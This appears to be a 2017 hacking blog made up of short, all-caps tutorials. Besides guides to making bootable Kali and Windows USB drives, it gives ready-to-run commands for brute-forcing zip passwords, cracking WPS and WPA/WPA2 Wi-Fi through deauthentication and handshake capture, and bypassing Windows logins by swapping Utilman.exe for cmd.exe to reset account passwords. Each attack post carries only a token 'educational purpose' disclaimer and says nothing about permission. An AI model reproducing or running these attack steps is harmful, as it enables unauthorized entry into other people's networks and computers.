Sunday, 2 April 2017

BOOTABLE KALI LINUX USB AND INSTALLATION

HELLO FRIENDS TODAY I WILL SHOW YOU HOW TO MAKE BOOTABLE KALI LINUX USB AND TO INSTALL KALI LINUX IN YOUR SYSTEM. FIRST OFF ALL WE NEED A KALI LINUX ISO FILE WHICH YOU CAN FIND  HERE , AND A SOFTWARE NAMED RUFUS WHICH YOU CAN FIND HERE AND A USB DRIVE TO WHICH YOU WANT TO MAKE BOOTABLE.
TO MAKE BOOTABLE KALI LINUX USB DRIVE FOLLOW THE FOLLOWING STEPS.

STEP 1>>> OPEN RUFUS AND CHOOSE YOUR USB DRIVE AND CHOOSE KALI LINUX ISO FILE  AND CLICK ON START.




STEP 2>>> WAIT TILL THE PROCESS FINISHES AND NOW WE ARE READY TO INSTALL KALI LINUX ON OUR PC.


TO INSTALL KALI LINUX WITHOUT ANY PROBLEM OR ERRORS , WE NEED A USB DRIVE OTHER THAN SAN DISK USB DRIVE , THAN FOLLOW THE FOLLOWING STEPS.


STEP 1>>> BOOT PC USING USB DRIVE AND SELECT GRAPHICAL INSTALL.

STEP 2>>> SELECT LANGUAGE AND REGION.
STEP 3>>> YOU ME CAME ACROSS AN ERROR DETECT AND MOUNT CD ROM .



AT THIS TIME YOU HAVE TO DO IS TO UNPLUG THE USB DRIVE AND REPLUG AND WAIT FOR USB TO MOUNT AND CLICK CONTINUE , AND FOLLOW THE NORMAL INSTALLATION PROCESS.

STEP 4>>>  SELECT GUIDED USE ENTIRE DISK 



STEP 4 >>> SELECT ALL FILES IN ONE PARTITION AND CONTINUE AND ENTER THE REQUIRED FIELDS  LIKE USR NAME , PASSWORD ETC . SO LINUX IS INSTALLED SUCCESSFULLY :)

THANK YOU 

Friday, 24 March 2017

CRACK ZIP FILE USING FCRACKZIP USING KALI LINUX

HELLO FRIENDS , TODAY I WILL SHOW YOU HOU TO CRACK ZIP FILE USING FCRACKZIP IN KALI LINUX .IF YOU ARE NEW TO HACKING AND KALI LINUX YOU CAN KNOW MORE ABOUT KALI LINUX  ON  https://www.kali.org/about-us/

THIS POST IS FOR EDUCATIONAL PURPOSE ONLY.

SO TO CRACK ZIP FILE YOU WILL REQUIRE KALI LINUX AND PASSWORD PROTECTED ZIP FILE , THAT YOU WANT TO CRACK AND FOLLOW THE FOLLOWING STEPS.

STEP 1)>>> OPEN KALI LINUX AND OPEN TERMINAL.
STEP 2)>>> AND TYPE fcrackzip --help

                      [ THIS CMD WILL HELP YOU IN UNDERSTANDING ABOUT THE FCRACKZIP CMD  ]

STEP 3)>>> IN THIS STEP WE WILL ENTER A CMD WHICH WILL CRACK THE PASSWORD , SO ENTER THE FOLLOWING CMD.

              >>>>>  fcrackzip -b -c aA1! -l 3-8 -u /root/Desktop/filename.zip

                    [ IN THHIS CMD 'b' IS FOR BRUTE FORCE  'C' IS USED FOR CHARACTER USED IN PASSWORD , 'a' IS USED FOR SMALL , 'A' IS FOR CAPITAL ,1 IS FOR NUMBERS , '!' IS FOR SYMBOLS , YOU CAN USE ANY ONE ACCORDING TO YOUR PASSWORD]


[ 'l' IS FOR LENGTH , 3 IS MINIMUM AND 8 IS MAXIMUM LENGTH OF PASSWORD , YOU CAN USE ACCORDING TO YOUR PASSWORD]

AFTER ENTERING THIS CMD , THIS WILL TAKE SOME TIME ACCORDING TO YOUR PASSWORD AND PC SPECS AND WILL DISPLAY THE PASSWORD.

THANK YOU.

Wednesday, 22 March 2017

HACK WPS WPA/WPA2 PROTECTED WIFI USING REAVER IN KALI LINUX

HELLO FRIENDS TODAY I WILL SHOW YOU HOW TO HACK  WPA/WPA2 Wi-Fi USING KALI LINUX. KALI LINUX IS A LINUX DISTRIBUTION MAINLY FOR PENITRATION TESTING AND HACKING . TO KNOW MORE ABOUT KALI LINUX VISIT
http://linkshrink.net/75gLNN

THIS POST IS FOR EDUCATIONAL PURPOSE ONLY.

FOR THIS YOU WILL NEED FEW THINGS
 1)>>> A WIRELESS ADAPTER CAPABLE FOR INJECTION, I WILL RECOMMAND YOU TO USE AN EXTERNAL ONE

TP-Link TL-WN722N 150Mbps Wireless USB Adapter .

YOU CAN BUY ONE on  http://linkshrink.net/7vuunA
AS IT IS ONE OF THE BEST ADAPTER FOR WIFI HACKING .
 2)>>>AND KALI LINUX INSTALLED ON YOUR PC OR ON VERTUAL BOX OR YOU CAN USE LIVE CD.
YOU CAN DOWNLOAD KALI LINUX ISO FILE FROM  http://linkshrink.net/7KTzWZ
NOW LET GET STARTED.....

STEP1)>>> OPEN TERMINAL IN KALI  LINUX AND ENTER THE FOLOWING COMMANDS

             >>> airmon-ng
             >>>airmon-ng start wlan0      (HERE wlan0 IS THE MY NETWORK INTERFACE NAME)
             >>>airodump-ng wlan0mon   ( HERE wlan0mon IS THE INTERFACE AFTER MONITOR                                                                 MODE)

STEP2)>>> NOW LET IT CAN ALL THE NETWORKS AVAILABLE AND PRESS CTRL+ C AND ENTER THE FOLLOWING COMMAND.

            >>> wash -i wlan0mon -c [channel] -C  -s
            >>> reaver -i wlan0mon -b [bssid] --fail-wait=360N 

NOW IT WILL TAKE TIME TO CRACK PASSWORD ACCORDING TO YOUR PASSWORD AND PC SPECS.

THANK YOU.

Sunday, 19 March 2017

HACK WPA/WPA2 Wi-Fi USING KALI LINUX WITHOUT WORDLIST

HELLO FRIENDS TODAY I WILL SHOW YOU HOW TO HACK  WPA/WPA2 Wi-Fi USING KALI LINUX. KALI LINUX IS A LINUX DISTRIBUTION MAINLY FOR PENITRATION TESTING AND HACKING . TO KNOW MORE ABOUT KALI LINUX VISIT
http://linkshrink.net/75gLNN

THIS POST IS FOR EDUCATIONAL PURPOSE ONLY.

FOR THIS YOU WILL NEED FEW THINGS
 1)>>> A WIRELESS ADAPTER CAPABLE FOR INJECTION, I WILL RECOMMAND YOU TO USE AN EXTERNAL ONE

TP-Link TL-WN722N 150Mbps Wireless USB Adapter .

YOU CAN BUY ONE on  http://linkshrink.net/7vuunA
AS IT IS ONE OF THE BEST ADAPTER FOR WIFI HACKING .
 2)>>>AND KALI LINUX INSTALLED ON YOUR PC OR ON VERTUAL BOX OR YOU CAN USE LIVE CD.
YOU CAN DOWNLOAD KALI LINUX ISO FILE FROM  http://linkshrink.net/7KTzWZ
NOW LET GET STARTED.....

STEP1)>>> OPEN TERMINAL IN KALI  LINUX AND ENTER THE FOLOWING COMMANDS

             >>> airmon-ng
             >>>airmon-ng start wlan0      (HERE wlan0 IS THE MY NETWORK INTERFACE NAME)
             >>>airodump-ng wlan0mon   ( HERE wlan0mon IS THE INTERFACE AFTER MONITOR                                                                 MODE)
STEP2)>>> NOW LET IT CAN ALL THE NETWORKS AVAILABLE AND PRESS CTRL+ C AND ENTER THE FOLLOWING COMMAND.

            >>> airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

STEP3)>>> NOW OPEN NEW TERMINAL AND ENTER THE FOLLOWING COMMAND.

            >>> aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0   ( BY ENTERING THIS CMD HANDSHAKE TAKE PLACE)
NOTE---- IN THIS METHOD NETWORK SHOULD HAVE A CLIENT .

STEP4)>>> NOW ENTER THE FOLLOWINF COMMAND TO CRACK PASSWORD.

            >>> crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng -b [bssid] -w - /root/Desktop/filename.cap


HERE FIRST 8 IS FOR THE MINIMUM LENGHT OF THE PASSWORD AND SECOND 8 FOR MAXIMUM.

NOW IT WILL TAKE TIME ACCORDING TO YOUR PASSWORD AND PC SPECS.

THANK YOU.


                 

HOW TO HACK WIN 7,8,10 PASSWORD USING KALI LINUX

HELLO FRIENDS TODAY I WILL SHOW YOU HOW YOU CAN HACK INTO WINDOWS USING KALI LINUX . KALI LINUX IS THE LINUX DISTRIBUTION MAINLY USE FOR PENITRATION TESTING AND HACKING . TO KNOW MORE ABOUT KALI LINUX VISIT
http://linkshrink.net/75gLNN

THIS POST IS ONLY FOR EDUCATIONAL PURPOSE .

FOR PENITRATING INTO WINDOWS FOLLOW THE FOLLOWING STEPS......

FOR THIS YOU WILL NEED A BOOTABLE KALI LINUX USB DRIVE . IF YOU DON'T HAVE ONE THAN CHECK OUT THIS LINK
SO LET GET STARTED........

STEP1)>>> BOOT INTO KALI LINUX USING USB DRIVE








STEP2)>>> NOW OPEN THE DRIVE IN WHICH WINDOWS IS INSTALLED AND OPEN WINDOWS FOLDER AND THAN RIGHT CLICK ON SYSTEM 32 FOLDER AND OPEN IT WITH TERMINAL AND ENTER THE FOLOWING COMMANDS.

                   >>>> mv Utilman.exe Utilman_bak.exe
                   >>>> cp cmd.exe Utilman.exe
                   >>>> reboot






NOW WINDOWS WILL START .
NOW CLICK ON EASE TO ACCESS BUTTON AND ENTER THE FOLLOWING COMMANDS.






                  >>>>> net user
                  >>>>> net user 'username' *
NOW IT WILL ASK YOU FOR PASSWORD, THAN ENTER ANY PASSWORD YOU WANT AND CONFIRM IT.

NOW YOU ARE DONE , OPEN USING THE PASSWORD THAT YOU ENTER IN TERMINAL.

Friday, 10 March 2017

MAKE BOOTABLE WINDOWS 7,8,10 USB DRIVE

      MAKE BOOTABLE WINDOWS 7,8,10 USB DRIVE

HELLO FRIENDS TODAY I WILL SHOW YOU HOW TO MAKE BOOTABLE WINDOWS PENDRIVE .

REQUIREMENTS = PENDRIVE , WINDOWS FILES , AND DOWNLOAD TWO SOFTWARE FROM GIVEN LINKS

NOW FOLLOW THE FOLLOWING STEPS....

STEP 1 = COPY WINDOWS FILE TO USB DRIVE (PEN DRIVE).
STEP 2 = OPEN SOFTWARE DOWNLOADED FROM FIRST LINK AND DO AS SHOWN IN IMAGES.

CLICK ON I AGREE.

NOW SELECT YOUR USB DRIVE.


CLICK OK AND CLICK ON CREATE.


NOW CLICK ON NEXT.

NOW FINISH.

STEP 3 = OPEN FILE menu.ls or menu USING NOTEPAD++ DOWNLOADED FROM LINK GIVEN AND TYPE THE FOLLOWING CODE IN 10 LINE .

title Install Windows 7
root (hd0,0)
chainloader (hd0,0)/bootmgr



NOW SAVE AND FINALLY WE HAVE CREATED A BOOTABLE USB DRIVE.
THANK YOU.